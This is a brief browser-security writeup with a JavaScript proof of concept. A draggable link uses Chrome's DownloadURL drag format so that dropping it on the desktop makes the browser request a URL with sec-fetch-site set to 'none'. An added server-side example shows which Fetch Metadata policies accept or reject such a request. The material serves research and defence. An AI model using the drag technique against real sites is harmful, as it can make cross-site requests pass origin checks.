Writeups

Drag the foo text onto your desktop; the resulting request would contain sec-fetch-site: 'none'.

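// Create a draggable link labelled "foo".
let link = document.createElement('a');
link.innerText = 'foo';
link.href = '#';
link.addEventListener('dragstart', onDragStart, false);
document.body.appendChild(link);

function onDragStart(e) {
  // Chrome's DownloadURL drag format is "<MIME type>:<file name>:<URL>".
  // Dropping the link on the desktop makes the browser download that URL.
  e.dataTransfer.setData(
    'DownloadURL',
    'application/octet-stream:demo:https://terjanq.me/xss.php?headers'
  );
  e.dataTransfer.effectAllowed = 'all';
}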

This SameSite issue was fixed in https://issues.chromium.org/40060358, but cross-origin download still works: https://www.youtube.com/watch?v=mqQjzx3HSUc
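
The server-side view of why the 'none' value matters, as an added example that is not part of the original writeup: a commonly deployed Fetch Metadata resource isolation policy accepts sec-fetch-site: 'none', so a request like the drag-out download passes it, while a same-origin-only check on sensitive endpoints rejects it. The function names and the sample header sets are constructed for illustration.

```javascript
// Added example: hypothetical helper names, constructed sample requests.
// Header names are lower-case, as Node's http module presents them.

// Baseline resource isolation policy as commonly deployed with Fetch Metadata.
function baselinePolicy(method, headers) {
  const site = headers['sec-fetch-site'];
  if (site === undefined) return true; // browser that sends no Fetch Metadata
  if (['same-origin', 'same-site', 'none'].includes(site)) return true;
  // Cross-site requests: allow only simple top-level navigations.
  return headers['sec-fetch-mode'] === 'navigate' &&
         method === 'GET' &&
         !['object', 'embed'].includes(headers['sec-fetch-dest']);
}

// Stricter policy for endpoints that only the site's own pages should call
// (assumption: e.g. authenticated downloads). 'none' is not accepted, and a
// missing header fails closed.
function strictPolicy(method, headers) {
  return headers['sec-fetch-site'] === 'same-origin';
}

// Constructed sample requests. The first mirrors what the page reports for
// the drag-out download; only the header the page mentions is set.
const samples = [
  { name: 'drag-out download', method: 'GET',
    headers: { 'sec-fetch-site': 'none' } },
  { name: 'cross-site fetch()', method: 'GET',
    headers: { 'sec-fetch-site': 'cross-site', 'sec-fetch-mode': 'cors',
               'sec-fetch-dest': 'empty' } },
  { name: 'same-origin fetch()', method: 'GET',
    headers: { 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'cors',
               'sec-fetch-dest': 'empty' } },
];

// Evaluate every sample under both policies.
function evaluate(list) {
  return list.map(({ name, method, headers }) => ({
    name,
    baseline: baselinePolicy(method, headers),
    strict: strictPolicy(method, headers),
  }));
}

console.table(evaluate(samples));
```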